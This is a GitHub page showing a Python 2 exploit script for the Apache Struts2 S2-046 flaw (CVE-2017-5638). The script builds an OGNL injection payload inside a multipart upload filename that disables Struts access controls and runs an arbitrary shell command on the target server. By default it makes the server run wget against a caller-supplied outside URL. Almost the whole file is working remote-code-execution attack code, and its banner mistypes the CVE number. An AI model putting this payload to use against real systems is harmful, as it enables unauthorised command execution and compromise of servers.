Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
62 lines (48 sloc) 2.33 KB
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
body = "------WebKitFormBoundaryXd004BVJN9pBYBL2\r\n"
body += "Content-Disposition: form-data; name=\"upload\"; filename=\"%s\"\r\n" %payload
body += "Content-Type: text/plain\r\n\r\n"
body += "miau\r\n"
body += "------WebKitFormBoundaryXd004BVJN9pBYBL2--\r\n"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Length': '1000000000','Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2'}
request = urllib2.Request(url,body,headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
print(page)
return page
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("[*] s2-046_cve2017-5638.py <url> <logurl>")
else:
print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| S2-046_CVE2017-5368 TestCode |"
print"\x20\x20| Rebujacker |"
print"\x20\x20+-------------------------------------------------+"
url = sys.argv[1]
logurl = sys.argv[2]
cmd = "wget %s" %logurl #Please don't change cmd or inject more commandsxD
exploit(url,cmd)
You can’t perform that action at this time.